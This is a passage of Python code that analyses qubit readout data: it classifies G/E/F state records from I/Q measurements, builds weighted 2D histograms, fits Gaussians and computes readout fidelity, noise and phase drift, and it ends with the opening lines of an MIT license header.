pc1 = axs[1,0].pcolormesh(bins_GE_G, bins_GE_G, (GE_G_fit_h+GE_E_fit_h)*(GE_is_G-1/2)/scale*5, cmap = newcmp, vmin = -1, vmax = 1)
plt.colorbar(pc1, ax = axs[1,0],fraction=0.046, pad=0.04)
GE_G_fit.plot_on_ax(axs[1,0])
axs[1,0].add_patch(GE_G_fit.sigma_contour())
GE_E_fit.plot_on_ax(axs[1,0])
axs[1,0].add_patch(GE_E_fit.sigma_contour())
# scale = np.max((GF_G_fit_h+GF_F_fit_h))
# pc2 = axs[1,1].pcolormesh(bins_GE_G, bins_GE_G, (GF_is_G-1/2)*(GF_G_fit_h+GF_F_fit_h)/scale*5, cmap = newcmp, vmin = -1, vmax = 1)
# plt.colorbar(pc1, ax = axs[1,1],fraction=0.046, pad=0.04)
# GF_G_fit.plot_on_ax(axs[1,1])
# axs[1,1].add_patch(GF_G_fit.sigma_contour())
# GF_F_fit.plot_on_ax(axs[1,1])
# axs[1,1].add_patch(GF_F_fit.sigma_contour())
# scale = np.max((EF_E_fit_h+EF_F_fit_h))
# pc3 = axs[1,2].pcolormesh(bins_GE_G, bins_GE_G, (EF_is_E-1/2)*(EF_E_fit_h+EF_F_fit_h)/scale*5, cmap = newcmp, vmin = -1, vmax = 1)
# plt.colorbar(pc1, ax = axs[1,2],fraction=0.046, pad=0.04)
# EF_E_fit.plot_on_ax(axs[1,2])
# axs[1,2].add_patch(EF_E_fit.sigma_contour())
# EF_F_fit.plot_on_ax(axs[1,2])
# axs[1,2].add_patch(EF_F_fit.sigma_contour())
fig3.tight_layout(h_pad = 0.1, w_pad = 1)
for ax in np.array(axs).flatten():
ax.set_aspect(1)
ax.grid()
#classify the records - done for each weight function
results = []
GE_results = []
GF_results = []
EF_results = []
all_I = np.vstack((sI_c1_classify, sI_c2_classify))
all_Q = np.vstack((sQ_c1_classify, sQ_c2_classify))
# print("all_I shape: ", np.shape(all_I))
# print(np.shape(list(zip(sI_c1, sQ_c1))))
for record in list(zip(all_I, all_Q)):
It, Qt = record[0], record[1]
#GE weights
ge_I = np.dot(Sge_I, It)+np.dot(Sge_Q, Qt)
ge_Q = np.dot(Sge_I, Qt)-np.dot(Sge_Q, It)
Iloc = np.digitize(ge_I, bins_GE_G)
Qloc = np.digitize(ge_Q, bins_GE_G)
if Iloc >= 99: Iloc = 98
if Qloc >= 99: Qloc = 98
#if 1 it's G
Sge_result = GE_is_G[Iloc, Qloc]
#GF weights
# gf_I = np.dot(Sgf_I, It)+np.dot(Sgf_Q, Qt)
# gf_Q = np.dot(Sgf_I, Qt)-np.dot(Sgf_Q, It)
# Iloc = np.digitize(gf_I, bins_GF_G)
# Qloc = np.digitize(gf_Q, bins_GF_G)
# if Iloc >= 99: Iloc = 98
# if Qloc >= 99: Qloc = 98
# #if 1 it's G
# Sgf_result = GF_is_G[Iloc, Qloc]
# #EF weights
# ef_I = np.dot(Sef_I, It)+np.dot(Sef_Q, Qt)
# ef_Q = np.dot(Sef_I, Qt)-np.dot(Sef_Q, It)
# Iloc = np.digitize(ef_I, bins_EF_E)
# Qloc = np.digitize(ef_Q, bins_EF_E)#edge-shifting
# if Iloc >= 99: Iloc = 98
# if Qloc >= 99: Qloc = 98
#if 1 it's E
# Sef_result = EF_is_E[Iloc, Qloc]
# print(Sge_result)
# print(Sgf_result)
if Sge_result:
result = 1 #G
else:
result = 2 #E
results.append(result)
GE_results.append(Sge_result)
# GF_results.append(Sgf_result)
# EF_results.append(Sef_result)
results = np.array(results)
#rescale so G-> 1, E-> 2, F -> 3
GE_results = np.logical_not(np.array(GE_results))+1
# GF_results = np.logical_not(np.array(GF_results))*2+1
# EF_results = np.logical_not(np.array(EF_results))+2
div1 = np.shape(sI_c1_classify)[0]
numRecords = 2*div1
# print(div1)
correct_classifications = np.append(np.ones(div1), 2*np.ones(div1))
numberNull = np.sum(results[results == 4]/4)
fidelity = np.round(np.sum(correct_classifications==results)/numRecords, 3)
if plot:
fig, ax = plt.subplots(5,1, figsize = (4, 8))
viridisBig = cm.get_cmap('viridis', 512)
_cmap = ListedColormap(viridisBig(np.linspace(0, 1, 256)))
scale = Norm(vmin = 1, vmax = 4)
ax[0].set_title("Correct classifications")
ax[0].imshow([correct_classifications, correct_classifications], interpolation = 'none', cmap = _cmap, norm = scale)
ax[1].set_title("GE classifications")
ax[1].imshow([GE_results,GE_results], interpolation = 'none', cmap = _cmap, norm = scale)
# ax[2].set_title("GF classifications")
# ax[2].imshow([GF_results,GF_results], interpolation = 'none', cmap = _cmap, norm = scale)
# ax[3].set_title("EF classifications")
# ax[3].imshow([EF_results,EF_results], interpolation = 'none', cmap = _cmap, norm = scale)
ax[4].set_title("Final classifications")
ax[4].get_yaxis().set_ticks([])
ax[4].set_label("Record number")
ax[4].imshow([results, results], interpolation = 'none', cmap = _cmap, norm = scale)
ax[4].set_aspect(1000)
for axi in ax:
axi.get_yaxis().set_ticks([])
axi.set_aspect(1000)
# ax[2].imshow([right, right], interpolation = 'none')
# ax[2].set_aspect(1000)
fig.tight_layout(h_pad = 1, w_pad = 1)
if debug:
print("checking sum: ", np.max(correct_classifications[2*div1:-1]==results[2*div1:-1]))
print("Number of Null results: ", numberNull)
print("Sge Imbar/sigma: ", np.linalg.norm(GE_G_fit.center_vec()-GE_E_fit.center_vec())/GE_G_fit.info_dict['sigma_x'])
# print("Sgf Imbar/sigma: ", np.linalg.norm(GF_G_fit.center_vec()-GF_F_fit.center_vec())/GF_G_fit.info_dict['sigma_x'])
# print("Sef Imbar/sigma: ", np.linalg.norm(EF_E_fit.center_vec()-EF_F_fit.center_vec())/EF_E_fit.info_dict['sigma_x'])
G_fidelity = np.round(np.sum(correct_classifications[0:div1]==results[0:div1])/div1, 3)
E_fidelity = np.round(np.sum(correct_classifications[div1:2*div1]==results[div1:2*div1])/div1, 3)
# F_fidelity = np.round(np.sum(correct_classifications[2*div1:-1]==results[2*div1:-1])/div1, 3)
return G_fidelity, E_fidelity, 0, fidelity, 0
def boxcar_histogram(fig, ax, start_pt, stop_pt, sI, sQ, Ioffset = 0, Qoffset = 0, scale = 1, num_bins = 100):
    """Average each record over a boxcar window and draw the 2D (I, Q) histogram.

    Each row of sI/sQ is one record; the samples in [start_pt, stop_pt) are
    background-subtracted and averaged down to a single (I, Q) point per record,
    then all points are binned into a square 2D histogram on `ax`.

    Args:
        fig, ax: matplotlib figure and axes to draw on.
        start_pt, stop_pt: sample window within each record.
        sI, sQ: 2D arrays (records x samples) of I and Q data.
        Ioffset, Qoffset: background levels subtracted before averaging.
        scale: half-width of the symmetric histogram range.
        num_bins: number of bin edges per axis.

    Returns:
        tuple: (bins, h) — the bin edges and the 2D histogram counts.
    """
    i_means = [np.average(row[start_pt:stop_pt] - Ioffset) for row in sI]
    q_means = [np.average(row[start_pt:stop_pt] - Qoffset) for row in sQ]
    bins = scale * np.linspace(-1, 1, num_bins)
    ax.set_aspect(1)
    h, _xedges, _yedges, im = ax.hist2d(i_means, q_means, bins = [bins, bins])
    # attach a colorbar in a dedicated axes strip to the right of the plot
    cax = make_axes_locatable(ax).append_axes('right', size='5%', pad=0.05)
    fig.colorbar(im, cax = cax, orientation = 'vertical')
    ax.grid()
    return bins, h
def weighted_histogram_mpl(weight_function_arr_I, weight_function_arr_Q, sI, sQ, scale = 1, num_bins = 100, record_track = False, plot = False, fig = None, ax = None):
    """Demodulate each record with I/Q weight functions and 2D-histogram the results.

    For each record, the demodulated point is
        I = <I_row, W_I> + <Q_row, W_Q>,  Q = <Q_row, W_I> - <I_row, W_Q>.

    Args:
        weight_function_arr_I, weight_function_arr_Q: weight vectors, one sample per time point.
        sI, sQ: 2D arrays (records x samples) of I and Q data.
        scale: half-width of the symmetric histogram range.
        num_bins: number of bin edges per axis.
        record_track: if True, also plot the per-record phase drift (uses plt).
        plot: if True, draw the histogram on `ax` (with colorbar on `fig`).
        fig, ax: matplotlib figure/axes, required only when plot is True.

    Returns:
        tuple: (bins, h, I_pts, Q_pts).
    """
    I_pts = []
    Q_pts = []
    for I_row, Q_row in zip(sI, sQ):
        I_pts.append(np.dot(I_row, weight_function_arr_I)+np.dot(Q_row, weight_function_arr_Q))
        Q_pts.append(np.dot(Q_row, weight_function_arr_I)-np.dot(I_row, weight_function_arr_Q))
    bins = np.linspace(-1,1, num_bins)*scale
    if plot:
        # ax.hist2d both computes and draws the histogram (counts match np.histogram2d)
        (h, xedges, yedges, im) = ax.hist2d(I_pts, Q_pts, bins = [bins, bins])
        divider = make_axes_locatable(ax)
        ax.set_aspect(1)
        cax = divider.append_axes('right', size='5%', pad=0.05)
        fig.colorbar(im, cax = cax, orientation = 'vertical')
    else:
        # BUGFIX: ax.hist2d was previously called unconditionally, raising
        # AttributeError with the default ax=None; compute the histogram without
        # matplotlib when not plotting.
        h, xedges, yedges = np.histogram2d(I_pts, Q_pts, bins = [bins, bins])
    if record_track:
        fig2, ax2 = plt.subplots()
        ax2.set_title("Record Tracking: Demodulated signals")
        ax2.set_xlabel("time (~us)")
        ax2.set_ylabel("$\phi(t)$")
        unwrapped_phases = np.mod(np.unwrap(np.arctan(np.array(I_pts[0:500])/np.array(Q_pts[0:500])), period = np.pi), 2*np.pi)
        ax2.plot(np.arange(500)*500, unwrapped_phases, '.', label = "phi(t)")
        print("Average phase difference between records: ", np.average(np.diff(unwrapped_phases))/np.pi*180, ' degrees')
    return bins, h, I_pts, Q_pts
def weighted_histogram(weight_function_arr_I, weight_function_arr_Q, sI, sQ, scale = 1, num_bins = 100, record_track = False, plot = False, fig = None, ax = None):
    """Demodulate each record with I/Q weight functions and 2D-histogram the results.

    Same demodulation as weighted_histogram_mpl, but the histogram is always
    computed with np.histogram2d and only drawn (pcolormesh) when plot is True.

    Args:
        weight_function_arr_I, weight_function_arr_Q: weight vectors, one sample per time point.
        sI, sQ: 2D arrays (records x samples) of I and Q data.
        scale: half-width of the symmetric histogram range.
        num_bins: number of bin edges per axis.
        record_track: if True, also plot per-record phase drift from sample column 100
                      of the first 500 records (uses plt).
        plot: if True, draw the histogram on `ax` (with colorbar on `fig`).
        fig, ax: matplotlib figure/axes, required only when plot is True.

    Returns:
        tuple: (bins, h, I_pts, Q_pts).
    """
    I_pts = []
    Q_pts = []
    for I_row, Q_row in zip(sI, sQ):
        I_pts.append(np.dot(I_row, weight_function_arr_I)+np.dot(Q_row, weight_function_arr_Q))
        Q_pts.append(np.dot(Q_row, weight_function_arr_I)-np.dot(I_row, weight_function_arr_Q))
    bins = np.linspace(-1,1, num_bins)*scale
    (h, xedges, yedges) = np.histogram2d(I_pts, Q_pts, bins = [bins, bins], density = False)
    if plot:
        im = ax.pcolormesh(bins, bins, h)
        divider = make_axes_locatable(ax)
        ax.set_aspect(1)
        cax = divider.append_axes('right', size='5%', pad=0.05)
        fig.colorbar(im, cax = cax, orientation = 'vertical')
    if record_track:
        fig2, ax2 = plt.subplots()
        ax2.set_title("Record Tracking: Demodulated signals")
        ax2.set_xlabel("time (~us)")
        ax2.set_ylabel("$\phi(t)$")
        unwrapped_phases = np.mod(np.unwrap(np.arctan(np.array(sI[0:500, 100])/np.array(sQ[0:500, 100])), period = np.pi), 2*np.pi)
        # BUGFIX: the x-axis previously used np.arange(100) while up to 500 phase
        # samples are plotted, raising a length-mismatch ValueError; size it to match.
        ax2.plot(np.arange(len(unwrapped_phases))*500, unwrapped_phases, '.', label = "phi(t)")
        print("Average phase difference between records: ", np.average(np.diff(unwrapped_phases))/np.pi*180, ' degrees')
    return bins, h, I_pts, Q_pts
'''
def Gaussian_2D(M,amplitude, xo, yo, sigma_x, sigma_y, theta):
x, y = M
xo = float(xo)
yo = float(yo)
a = (np.cos(theta)**2)/(2*sigma_x**2) + (np.sin(theta)**2)/(2*sigma_y**2)
b = -(np.sin(2*theta))/(4*sigma_x**2) + (np.sin(2*theta))/(4*sigma_y**2)
c = (np.sin(theta)**2)/(2*sigma_x**2) + (np.cos(theta)**2)/(2*sigma_y**2)
g = amplitude*np.exp( - (a*((x-xo)**2) + 2*b*(x-xo)*(y-yo)
+ c*((y-yo)**2)))
return g
'''
def Gaussian_2D(M, amplitude, xo, yo, sigma):
    """Circular (theta = 0) 2D Gaussian evaluated at the coordinates M = (x, y).

    Args:
        M: pair (x, y) of coordinates (scalars or numpy arrays).
        amplitude: peak value at the center.
        xo, yo: center coordinates.
        sigma: common standard deviation for both axes.

    Returns:
        Gaussian value(s) with the same shape as x and y.
    """
    theta = 0
    x, y = M
    dx = x - float(xo)
    dy = y - float(yo)
    # general quadratic-form coefficients; with theta = 0 the cross term b vanishes
    a = (np.cos(theta)**2)/(2*sigma**2) + (np.sin(theta)**2)/(2*sigma**2)
    b = -(np.sin(2*theta))/(4*sigma**2) + (np.sin(2*theta))/(4*sigma**2)
    c = (np.sin(theta)**2)/(2*sigma**2) + (np.cos(theta)**2)/(2*sigma**2)
    return amplitude*np.exp( - (a*(dx**2) + 2*b*dx*dy + c*(dy**2)))
def Gaussian_2D_tilted(M, amplitude, xo, yo, sigma, theta = 0):
    """2D Gaussian with an (optional) rotation angle, evaluated at M = (x, y).

    Note: both axes share the same sigma, so the shape is circular and theta has
    no net effect on the value; the parameter is kept for interface parity.

    Args:
        M: pair (x, y) of coordinates (scalars or numpy arrays).
        amplitude: peak value at the center.
        xo, yo: center coordinates.
        sigma: standard deviation (shared by both axes).
        theta: rotation angle in radians.

    Returns:
        Gaussian value(s) with the same shape as x and y.
    """
    x, y = M
    dx = x - float(xo)
    dy = y - float(yo)
    two_sig2 = 2*sigma**2
    four_sig2 = 4*sigma**2
    a = (np.cos(theta)**2)/two_sig2 + (np.sin(theta)**2)/two_sig2
    b = -(np.sin(2*theta))/four_sig2 + (np.sin(2*theta))/four_sig2
    c = (np.sin(theta)**2)/two_sig2 + (np.cos(theta)**2)/two_sig2
    return amplitude*np.exp( - (a*(dx**2) + 2*b*dx*dy + c*(dy**2)))
class Gaussian_info:
    """Container for the results of a 2D-Gaussian fit (populated by fit_2D_Gaussian).

    All fitted quantities live in `info_dict` with keys: 'name', 'canvas'
    (the (2, N) coordinate grid the fit was evaluated on), 'amplitude',
    'x0', 'y0', 'sigma_x', 'sigma_y', 'popt', 'pcov'.
    """
    def __init__(self):
        # filled in externally (see fit_2D_Gaussian)
        self.info_dict = {}
    def print_info(self):
        """Print all scalar entries, skipping the bulky popt/pcov arrays."""
        for key, val in self.info_dict.items():
            if key == 'popt':
                pass
            elif key == 'pcov':
                pass
            else:
                print(key, ': ', val)
    def __sub__(self, other_GC):
        """Entry-wise difference of scalar (np.float64) values; non-scalars map to None."""
        sub_class = Gaussian_info()
        for key, val in self.info_dict.items():
            if type(val) == np.float64:
                sub_class.info_dict[key] = val - other_GC.info_dict[key]
            else:
                sub_class.info_dict[key] = None
        return sub_class
    def center_vec(self):
        """Return the fitted center as np.array([x0, y0])."""
        return np.array([self.info_dict['x0'], self.info_dict['y0']])
    def plot_on_ax(self, ax, displacement = np.array([0,0]), color = 'white'):
        """Draw an arrow from the origin to the fitted center on the given axes."""
        ax.annotate("", xy=self.center_vec(), xytext=(0,0), arrowprops=dict(arrowstyle = '->', lw = 3, color = color))
    def plot_array(self):
        """Evaluate the fitted Gaussian on the stored coordinate grid.

        BUGFIX: Gaussian_2D takes the coordinate array M as its first argument;
        previously only *popt was unpacked, so popt[0] (the amplitude) was
        misused as M. The grid saved under 'canvas' is now passed explicitly.
        """
        return Gaussian_2D(self.info_dict['canvas'], *self.info_dict['popt'])
    def sigma_contour(self):
        """Return a dashed red Ellipse marking the 1-sigma contour of the fit."""
        x0, y0 = self.center_vec()
        sx = self.info_dict['sigma_x']
        sy = self.info_dict['sigma_y']
        # theta is not fitted by the circular model; keep the contour unrotated
        angle = 0
        return Ellipse((x0, y0), sx, sy, angle = angle/(2*np.pi)*360,
                       fill = False,
                       ls = '--',
                       color = 'red',
                       lw = 2)
def fit_2D_Gaussian(name,
                    bins,
                    h_arr,
                    guessParams,
                    max_fev = 10000,
                    contour_line = 0,
                    debug = False):
    """Fit a circular 2D Gaussian to a binned histogram and package the result.

    Args:
        name: label stored with the fit result.
        bins: bin edges (the last edge is dropped to build the coordinate grid).
        h_arr: 2D histogram counts to fit.
        guessParams: initial guess (amplitude, x0, y0, sigma) for curve_fit.
        max_fev: maximum number of function evaluations for curve_fit.
        contour_line: unused; kept for interface compatibility.
        debug: if True, print the maxfev being used.

    Returns:
        Gaussian_info: container holding the fitted parameters and covariance.
    """
    if debug:
        print("fitting with maxfev = ", max_fev)
    X, Y = np.meshgrid(bins[0:-1], bins[0:-1])
    xdata = np.vstack((X.ravel(), Y.ravel()))
    ydata = h_arr.ravel()
    # bounds follow the parameter order: amplitude, x0, y0, sigma
    lower = [0, np.min(bins), np.min(bins), 0]
    upper = [10*np.max(h_arr), np.max(bins), np.max(bins), np.max(bins)]
    popt, pcov = curve_fit(Gaussian_2D, xdata, ydata, p0 = guessParams, maxfev = max_fev, bounds = (lower, upper))
    amplitude, x0, y0, sigma = popt
    GC = Gaussian_info()
    GC.info_dict.update({
        'name': name,
        'canvas': xdata,
        'amplitude': amplitude,
        'x0': x0,
        'y0': y0,
        # the model is circular, so both sigmas are the same fitted magnitude
        'sigma_x': np.abs(sigma),
        'sigma_y': np.abs(sigma),
        'popt': popt,
        'pcov': pcov,
    })
    return GC
def extract_3pulse_phase_differences_from_filepath(datapath, numRecords = 3840*2, window = [0, -1], bc_window = [50, 150], scale = 2):
    """Estimate the average record-to-record phase drift of the G-state records.

    Loads a 3-pulse (G/E/F) acquisition from an hdf5 file, demodulates the
    G-state records with a boxcar weight, and reports the mean phase step
    between consecutive records in degrees.

    Args:
        datapath: path to the hdf5 file readable by all_datadicts_from_hdf5.
        numRecords: total number of records across the three states.
        window: [start, stop] sample window (kept for interface parity).
        bc_window: [start, stop] samples of the boxcar weight function.
        scale: histogram half-range passed to weighted_histogram.

    Returns:
        float: average phase difference between records, in degrees.
    """
    dd = all_datadicts_from_hdf5(datapath)['data']
    offset = window[0]
    rtrim = window[-1]
    time_unit = dd['time']['unit']
    I_offset, Q_offset = 0,0
    time_vals = dd['time']['values'].reshape((numRecords//3, np.size(dd['time']['values'])//(numRecords//3)))
    rec_unit = dd['record_num']['unit']
    rec_num = dd['record_num']['values'].reshape((numRecords//3, np.size(dd['time']['values'])//(numRecords//3)))
    I_G = dd['I_G']['values'].reshape((numRecords//3, np.size(dd['time']['values'])//(numRecords//3)))-I_offset
    I_E = dd['I_E']['values'].reshape((numRecords//3, np.size(dd['time']['values'])//(numRecords//3)))-I_offset
    I_F = dd['I_F']['values'].reshape((numRecords//3, np.size(dd['time']['values'])//(numRecords//3)))-I_offset
    Q_G = dd['Q_G']['values'].reshape((numRecords//3, np.size(dd['time']['values'])//(numRecords//3)))-Q_offset
    Q_E = dd['Q_E']['values'].reshape((numRecords//3, np.size(dd['time']['values'])//(numRecords//3)))-Q_offset
    Q_F = dd['Q_F']['values'].reshape((numRecords//3, np.size(dd['time']['values'])//(numRecords//3)))-Q_offset
    #averages
    I_G_avg = np.average(I_G, axis = 0)
    I_E_avg = np.average(I_E, axis = 0)
    I_F_avg = np.average(I_F, axis = 0)
    Q_G_avg = np.average(Q_G, axis = 0)
    Q_E_avg = np.average(Q_E, axis = 0)
    Q_F_avg = np.average(Q_F, axis = 0)
    WF = np.zeros(np.size(time_vals[0]))
    WF[bc_window[0]:bc_window[1]] = 1
    Sge = Sgf = Sef = WF
    fig2, ax11 = plt.subplots()
    # BUGFIX(review): the original call passed (fig2, ax11, Sge, I_G, Q_G, ...),
    # which does not match weighted_histogram's signature (weights_I, weights_Q,
    # sI, sQ, ...) and supplied `scale` twice -> TypeError. The boxcar weight is
    # used for both quadratures (matching the Sge_I/Sge_Q pattern elsewhere), and
    # record tracking is done explicitly below rather than inside the helper.
    bins_GE_G, h_GE_G, I_pts, Q_pts = weighted_histogram(Sge, Sge, I_G, Q_G, scale = scale, plot = True, fig = fig2, ax = ax11)
    fig2, ax2 = plt.subplots()
    ax2.set_title("Record Tracking")
    ax2.set_xlabel("time (~us)")
    ax2.set_ylabel("$\phi(t)$")
    unwrapped_phases = np.unwrap(np.arctan(np.array(I_pts[0:500])/np.array(Q_pts[0:500])), period = np.pi)
    ax2.plot(np.arange(500)*500, unwrapped_phases, '.', label = "phi(t)")
    print("Average phase difference between records: ", np.average(np.diff(unwrapped_phases))/np.pi*180, ' degrees')
    ax2.hlines(-12*np.pi, 0, 20000)
    ax2.grid()
    return np.average(np.diff(unwrapped_phases))/np.pi*180
def extract_3pulse_noise_from_filepath(datapath, numRecords = 3840*2, window = [0, -1]):
    """Compute the noise (std of the record-to-average deviation magnitude)
    for the G, E and F state records of a 3-pulse acquisition.

    Args:
        datapath: path to the hdf5 file readable by all_datadicts_from_hdf5.
        numRecords: total number of records across the three states.
        window: [start, stop] sample window used for the noise estimate.

    Returns:
        list[float]: [noise_G, noise_E, noise_F].
    """
    dd = all_datadicts_from_hdf5(datapath)['data']
    offset, rtrim = window[0], window[-1]
    time_unit = dd['time']['unit']
    I_offset, Q_offset = 0, 0
    n_rec = numRecords//3
    n_samp = np.size(dd['time']['values'])//n_rec

    def _records(key, background):
        # reshape the flat value array to (records, samples) and remove background
        return dd[key]['values'].reshape((n_rec, n_samp)) - background

    time_vals = dd['time']['values'].reshape((n_rec, n_samp))
    rec_unit = dd['record_num']['unit']
    rec_num = dd['record_num']['values'].reshape((n_rec, n_samp))
    I_G, I_E, I_F = (_records(k, I_offset) for k in ('I_G', 'I_E', 'I_F'))
    Q_G, Q_E, Q_F = (_records(k, Q_offset) for k in ('Q_G', 'Q_E', 'Q_F'))
    # per-sample averages over all records
    I_G_avg, I_E_avg, I_F_avg = (np.average(a, axis = 0) for a in (I_G, I_E, I_F))
    Q_G_avg, Q_E_avg, Q_F_avg = (np.average(a, axis = 0) for a in (Q_G, Q_E, Q_F))
    print(np.shape(I_G))
    print(np.shape(I_G_avg))
    print(np.average(I_G_avg))

    def _noise(I, I_avg, Q, Q_avg):
        # magnitude of each record's deviation from the mean trace, then its std
        dev = np.sqrt((I[:, offset: rtrim]-I_avg[offset:rtrim])**2+(Q[:, offset: rtrim]-Q_avg[offset:rtrim])**2)
        return np.sqrt(np.var(dev))

    return [_noise(I_G, I_G_avg, Q_G, Q_G_avg),
            _noise(I_E, I_E_avg, Q_E, Q_E_avg),
            _noise(I_F, I_F_avg, Q_F, Q_F_avg)]
def extract_3pulse_pwr_from_filepath(datapath, numRecords = 3840*2, window = [0, -1]):
    """Compute the average signal magnitude of the mean G, E and F traces.

    Args:
        datapath: path to the hdf5 file readable by all_datadicts_from_hdf5.
        numRecords: total number of records across the three states.
        window: [start, stop] sample window used for the average.

    Returns:
        tuple: (pwr_G, pwr_E, pwr_F) mean magnitudes over the window.
    """
    dd = all_datadicts_from_hdf5(datapath)['data']
    offset, rtrim = window[0], window[-1]
    time_unit = dd['time']['unit']
    I_offset, Q_offset = 0, 0
    n_rec = numRecords//3
    n_samp = np.size(dd['time']['values'])//n_rec

    def _records(key, background):
        # reshape the flat value array to (records, samples) and remove background
        return dd[key]['values'].reshape((n_rec, n_samp)) - background

    time_vals = dd['time']['values'].reshape((n_rec, n_samp))
    rec_unit = dd['record_num']['unit']
    rec_num = dd['record_num']['values'].reshape((n_rec, n_samp))
    I_G, I_E, I_F = (_records(k, I_offset) for k in ('I_G', 'I_E', 'I_F'))
    Q_G, Q_E, Q_F = (_records(k, Q_offset) for k in ('Q_G', 'Q_E', 'Q_F'))
    # per-sample averages over all records
    I_G_avg, I_E_avg, I_F_avg = (np.average(a, axis = 0) for a in (I_G, I_E, I_F))
    Q_G_avg, Q_E_avg, Q_F_avg = (np.average(a, axis = 0) for a in (Q_G, Q_E, Q_F))

    def _mean_mag(I_avg, Q_avg):
        # mean of |I + iQ| of the averaged trace over the analysis window
        return np.average(np.sqrt(I_avg**2+Q_avg**2)[offset:rtrim])

    return _mean_mag(I_G_avg, Q_G_avg), _mean_mag(I_E_avg, Q_E_avg), _mean_mag(I_F_avg, Q_F_avg)
def extract_3pulse_histogram_from_filepath(datapath, plot = False, hist_scale = None, numRecords = 3840*2, rec_start = 0, rec_stop = -1, IQ_offset = (0,0), fit = False, lpf = True, lpf_wc = 50e6, boxcar = False, bc_window = [50, 150], record_track = True, tuneup_plots = True, debug = False, tstart_index = 0, tstop_index = -1, phase_correction_rate = 0, figscale = 1, guess = 0, rec_skip = 5):
    """Load a 3-pulse (G/E/F) acquisition and hand it to Process_One_Acquisition_3_state.

    Reshapes the flat hdf5 arrays to (records, samples), subtracts the I/Q
    offsets, optionally de-rotates a drifting generator phase, and forwards
    everything (plus all tuning knobs) to the processing class.

    Args:
        datapath: path to the hdf5 file readable by all_datadicts_from_hdf5.
        numRecords: total number of records across the three states.
        IQ_offset: (I, Q) background offsets subtracted from every sample.
        phase_correction_rate: radians per record of generator phase drift to undo.
        (remaining arguments are forwarded unchanged to Process_One_Acquisition_3_state)

    Returns:
        The Process_One_Acquisition_3_state result object.
    """
    I_offset, Q_offset = IQ_offset
    dd = all_datadicts_from_hdf5(datapath)['data']
    if debug:
        print("dd keys",dd.keys())
    time_unit = dd['time']['unit']
    n_rec = numRecords//3
    n_samp = np.size(dd['time']['values'])//n_rec
    time_vals = dd['time']['values'].reshape((n_rec, n_samp))
    rec_unit = dd['record_num']['unit']
    rec_num = dd['record_num']['values'].reshape((n_rec, n_samp))
    I_G = dd['I_G']['values'].reshape((n_rec, n_samp))-I_offset
    I_E = dd['I_E']['values'].reshape((n_rec, n_samp))-I_offset
    I_F = dd['I_F']['values'].reshape((n_rec, n_samp))-I_offset
    Q_G = dd['Q_G']['values'].reshape((n_rec, n_samp))-Q_offset
    Q_E = dd['Q_E']['values'].reshape((n_rec, n_samp))-Q_offset
    Q_F = dd['Q_F']['values'].reshape((n_rec, n_samp))-Q_offset
    #attempting to correct a rotating generator phase
    pcr = phase_correction_rate
    C = np.cos(pcr*rec_num)
    S = np.sin(pcr*rec_num)
    # BUGFIX: the rotation previously overwrote I_G before computing Q_G, so the
    # Q component was built from the already-rotated I. Rotating each (I, Q)
    # pair atomically applies the intended rotation matrix.
    I_G, Q_G = I_G*C - Q_G*S, Q_G*C + I_G*S
    I_E, Q_E = I_E*C - Q_E*S, Q_E*C + I_E*S
    I_F, Q_F = I_F*C - Q_F*S, Q_F*C + I_F*S
    return Process_One_Acquisition_3_state(datapath.split('/')[-1].split('\\')[-1], time_vals[0], I_G, I_E, I_F, Q_G, Q_E, Q_F,hist_scale = hist_scale, plot = plot, fit = fit, lpf = lpf, lpf_wc = lpf_wc, boxcar = boxcar, bc_window = bc_window, record_track = record_track, rec_start = rec_start, rec_stop = rec_stop, debug = debug, tstart_index = tstart_index, tstop_index = tstop_index, figscale = figscale, guess = guess, rec_skip = rec_skip)
def extract_2pulse_histogram_from_filepath(datapath, plot = False, hist_scale = None, numRecords = 3840*2, numRecordsUsed = 3840*2, IQ_offset = (0,0), fit = False, lpf = True, lpf_wc = 50e6, boxcar = False, bc_window = [50, 150], record_track = True, tuneup_plots = True, debug = False):
    """Load a 2-pulse (plus/minus) acquisition and hand it to Process_One_Acquisition_2_state.

    Reshapes the flat hdf5 arrays to (records, samples), subtracts the I/Q
    offsets, prints sanity-check counts, and forwards everything to the
    processing class.

    Args:
        datapath: path to the hdf5 file readable by all_datadicts_from_hdf5.
        numRecords: total number of records across the two states.
        numRecordsUsed: number of records the processing step should use.
        IQ_offset: (I, Q) background offsets subtracted from every sample.
        (remaining arguments are forwarded unchanged to Process_One_Acquisition_2_state)

    Returns:
        The Process_One_Acquisition_2_state result object.
    """
    I_offset, Q_offset = IQ_offset
    dd = all_datadicts_from_hdf5(datapath)['data']
    if debug:
        print("dd keys",dd.keys())
    time_unit = dd['time']['unit']
    time_vals = dd['time']['values'].reshape((numRecords//2, np.size(dd['time']['values'])//(numRecords//2)))
    print("Number of unique time values: %f"%np.size(np.unique(time_vals)))
    rec_unit = dd['record_num']['unit']
    rec_num = dd['record_num']['values'].reshape((numRecords//2, np.size(dd['time']['values'])//(numRecords//2)))
    print("Number of unique records: %f"%np.size(np.unique(rec_num)))
    # BUGFIX: this line previously re-printed the measured unique-record count,
    # duplicating the line above; it is meant to echo the user-supplied total.
    print("User input of record number: %f"%numRecords)
    I_G = dd['I_plus']['values'].reshape((numRecords//2, np.size(dd['time']['values'])//(numRecords//2)))-I_offset
    I_E = dd['I_minus']['values'].reshape((numRecords//2, np.size(dd['time']['values'])//(numRecords//2)))-I_offset
    Q_G = dd['Q_plus']['values'].reshape((numRecords//2, np.size(dd['time']['values'])//(numRecords//2)))-Q_offset
    Q_E = dd['Q_minus']['values'].reshape((numRecords//2, np.size(dd['time']['values'])//(numRecords//2)))-Q_offset
    #averages (per-sample means over all records)
    I_G_avg = np.average(I_G, axis = 0)
    I_E_avg = np.average(I_E, axis = 0)
    Q_G_avg = np.average(Q_G, axis = 0)
    Q_E_avg = np.average(Q_E, axis = 0)
    return Process_One_Acquisition_2_state(datapath.split('/')[-1].split('\\')[-1], time_vals[0], I_G, I_E, Q_G, Q_E,hist_scale = hist_scale, plot = plot, fit = fit, lpf = lpf, lpf_wc = lpf_wc, boxcar = boxcar, bc_window = bc_window, record_track = record_track, numRecordsUsed = numRecordsUsed, debug = debug)
def hist_discriminant(h1, h2):
    """Boolean mask over histogram bins: True where h1 has more counts than h2."""
    diff = h1 - h2
    return diff > 0
|
"""
MIT License
Copyright (c) 2019 - 2022 <NAME> <<EMAIL>>
Permission is hereby granted, free of charge, to any person obtaining a copy
of this software and associated documentation files (the "Software"), to deal
in the Software without restriction, including without limitation the rights
to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
copies of the Software, and to permit persons to whom the Software is
